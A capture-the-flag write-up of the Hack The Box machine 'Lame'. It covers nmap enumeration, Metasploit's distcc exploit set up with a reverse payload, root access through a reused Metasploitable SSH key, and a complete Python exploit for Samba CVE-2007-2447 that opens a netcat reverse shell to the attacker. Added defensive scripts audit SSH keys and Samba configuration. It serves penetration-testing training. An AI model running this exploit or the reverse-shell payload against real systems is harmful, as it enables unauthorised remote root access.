10.10.10.3 - Lame - DistCC, SMB, SSH Reuse
A Metasploitable-like VM - back to old school
Summary:
Vulnerable software: distccd (PoC); netbios-ssn / Samba (PoC)
Vulnerable system: 10.10.10.3
Vulnerability explanation: privilege escalation through SSH key reuse; the SMB service runs as root
Severity: critical
Enumeration:
```
[+] Running only TCP port scan

Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:04 GMT
Nmap scan report for 10.10.10.3
Host is up (0.31s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: terminal|WAP|switch|specialized|general purpose|broadband router
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Chip PC embedded (92%), SNR embedded (90%), Crestron 2-Series (90%), Asus embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:snr:snr-s2960 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:asus:rt-ac66u cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Chip PC XtremePC thin client (92%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (90%), OpenWrt White Russian 0.9 (Linux 2.4.30) (90%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (90%), SNR SNR-S2960 switch (90%), Crestron XPanel control system (90%), Linux 2.4.18 (90%), Asus RT-AC66U router (Linux 2.6) (89%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (89%), Asus RT-N16 WAP (Linux 2.6) (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.68 seconds
```
Nmap has a script that can confirm the vulnerability in distccd:
```
└──╼ $nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:23 GMT
Nmap scan report for 10.10.10.3
Host is up (0.19s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-cve2004-2687:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|       http://distcc.googlecode.com/svn/trunk/doc/web/security.html
|       http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
|_      http://http://www.osvdb.org/13378

Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds
```
Distccd exploitation:
```
msf5 exploit(unix/misc/distcc_exec) > search distcc

Matching Modules
================

   Name                           Disclosure Date  Rank       Check  Description
   ----                           ---------------  ----       -----  -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution


msf5 exploit(unix/misc/distcc_exec) > options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT  4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target
```
Result:
Whilst browsing the root folder I found a .ssh folder containing an authorized_keys file with a familiar login name, msfadmin:
```
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
```
It made me think that this box was built upon the popular pentesting VM Metasploitable. I started this VM to compare the details and confirmed that the kernel version is the same as well:
All I needed to do now was to use the Metasploitable id_rsa key to log in to Lame as root without a password, with the command:
```
ssh root@10.10.10.3 -i id_rsa
```
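A defender's counterpart to the key reuse above, added here as an example and not part of the original writeup: it parses authorized_keys entries, computes OpenSSH-style SHA256 fingerprints and flags any key on a blocklist of known shared keys, seeded with the msfadmin public key found on this box. The sample file, the ed25519 entry and the blocklist label are constructed for the example.

```python
import base64
import hashlib

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256"}


def fingerprint(blob: bytes) -> str:
    """OpenSSH-style SHA256 fingerprint of a raw (base64-decoded) public key blob."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def parse_entry(line: str):
    """(key_type, blob, comment) for one authorized_keys line, None for blank or comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = line.split()
    for i, tok in enumerate(tokens[:-1]):  # scanning skips leading options such as from="..."
        if tok in KEY_TYPES:
            blob = base64.b64decode(tokens[i + 1])
            # the wire format starts with a length-prefixed copy of the type; it must match the declared one
            if blob[4:4 + len(tok)] != tok.encode():
                raise ValueError("declared key type does not match key blob")
            return tok, blob, " ".join(tokens[i + 2:])
    raise ValueError("no public key found in entry")


# Public key found in /root/.ssh/authorized_keys on Lame: the Metasploitable msfadmin key, whose
# private half ships with that VM, so any host that trusts it is open to anyone who has the image.
LAME_ROOT_KEY = ("ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable")

# Blocklist keyed by fingerprint; extend it with any keys known to be shared or leaked
KNOWN_SHARED_KEYS = {fingerprint(parse_entry(LAME_ROOT_KEY)[1]): "Metasploitable 2 msfadmin key"}


def audit_authorized_keys(text: str):
    """Return [(line_no, key_type, comment, fingerprint, reason)] for each blocklisted entry."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if entry is not None:
            key_type, blob, comment = entry
            fp = fingerprint(blob)
            if fp in KNOWN_SHARED_KEYS:
                findings.append((line_no, key_type, comment, fp, KNOWN_SHARED_KEYS[fp]))
    return findings


# Constructed sample file: the shared key plus a clean ed25519 entry (made-up 32-byte point, with options)
TOY_ED25519 = base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(range(32))).decode()
SAMPLE_AUTHORIZED_KEYS = ("# constructed sample of /root/.ssh/authorized_keys\n" + LAME_ROOT_KEY + "\n"
                          + 'from="10.10.14.0/24" ssh-ed25519 ' + TOY_ED25519 + " ops@lab\n")
```

audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS) returns a single finding for line 2, the msfadmin key; the constructed ed25519 entry passes.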
Share discovery on port 139:
```
└──╼ $smbmap -u "" -p "" -H 10.10.10.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.3...
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
        Disk                                                    Permissions
        ----                                                    -----------
        print$                                                  NO ACCESS
        tmp                                                     READ, WRITE
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS
        ADMIN$                                                  NO ACCESS

└──╼ $enum4linux 10.10.10.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 2 13:08:53 2019

=======================================
|    Share Enumeration on 10.10.10.3    |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Unable to initialize messaging context

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME
```
Searchsploit Samba 3.0.20
Python version of the Samba 3.0.20 < 3.0.25rc3 'Username map script' exploit (CVE-2007-2447):
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection  # pysmb


def exploit(rhost, rport, lhost, lport):
    # reverse shell command; the vulnerable "username map script" hook passes the username to a shell
    payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        conn.connect(rhost, int(rport), timeout=1)
    except Exception:
        # the session setup never completes normally once the command has been run
        print('[+] Payload was sent - check netcat !')


if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)
```
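A defender's check added here as an example, not part of the original writeup or of the exploit's repository: it turns the Samba banner from the enum4linux output above into a comparable version, tests it against the affected range 3.0.20 <= version < 3.0.25rc3 from the searchsploit title, and looks for the `username map script` parameter in smb.conf, the hook that hands the username to a shell under the root-owned smbd. The smb.conf fragment and the script path are constructed.

```python
import re

# CVE-2007-2447 affects Samba 3.0.20 up to, but not including, 3.0.25rc3 (range from the searchsploit title)
AFFECTED_FROM = (3, 0, 20, 1, 0)
FIXED_IN = (3, 0, 25, 0, 3)
_VERSION_RE = re.compile(r"Samba\s+(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", re.IGNORECASE)


def parse_samba_version(banner):
    """(major, minor, patch, final_flag, rc) from e.g. 'Samba 3.0.20-Debian'; 3.0.25rc3 sorts before 3.0.25."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    return (major, minor, patch, 0, int(m.group(4))) if m.group(4) else (major, minor, patch, 1, 0)


def username_map_script(smb_conf):
    """Value of 'username map script' in [global], or None; names are case- and whitespace-insensitive."""
    section = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line and section == "global":
            key, value = line.split("=", 1)
            if "".join(key.split()).lower() == "usernamemapscript":
                return value.strip()
    return None


def assess(banner, smb_conf):
    """Combine the version check with the configuration hook the exploit needs; both must hold."""
    version = parse_samba_version(banner)
    affected = version is not None and AFFECTED_FROM <= version < FIXED_IN
    script = username_map_script(smb_conf)
    return {"version": version, "version_affected": affected, "username_map_script": script,
            "exploitable": affected and script is not None}


# Constructed inputs: the banner from the enum4linux output above and a made-up smb.conf fragment
LAME_BANNER = "IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))"
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""
```

Removing the parameter from [global] (or upgrading past 3.0.25rc3) flips the result to not exploitable; the generic nmap banner "Samba smbd 3.X - 4.X" carries no version and yields None, so the enum4linux string is the one to feed in.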
Exploit:
Result: